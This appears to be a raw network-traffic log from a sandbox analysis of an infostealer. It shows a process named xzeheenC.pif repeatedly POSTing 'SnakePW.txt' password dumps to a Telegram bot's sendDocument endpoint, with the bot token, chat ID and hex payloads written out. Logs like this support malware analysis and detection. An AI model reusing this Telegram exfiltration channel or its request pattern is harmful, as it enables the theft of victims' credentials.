                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418900,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535089,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      48192.168.2.549966149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:11 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd212895f468d0
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 32 38 39 35 66 34 36 38 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd212895f468d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418904,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      49192.168.2.549967149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:11 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2140552249de
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 30 35 35 32 32 34 39 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2140552249deContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418907,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      50192.168.2.549968149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:11 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd222e6a7585d6
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 65 36 61 37 35 38 35 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd222e6a7585d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:11 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:11 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:11 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418905,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535091,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      51192.168.2.549973149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:13 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd214541f09a2e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 35 34 31 66 30 39 61 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd214541f09a2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418910,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.549974149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:13 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd225faa7b54ce
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 35 66 61 61 37 62 35 34 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd225faa7b54ceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418911,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      53192.168.2.549976149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:13 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2161f5499881
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:13 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 31 66 35 34 39 39 38 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2161f5499881Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:14 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:13 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:14 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418913,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535093,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      54192.168.2.549982149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21699b4eabd7
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 39 39 62 34 65 61 62 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd21699b4eabd7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:15 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:15 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
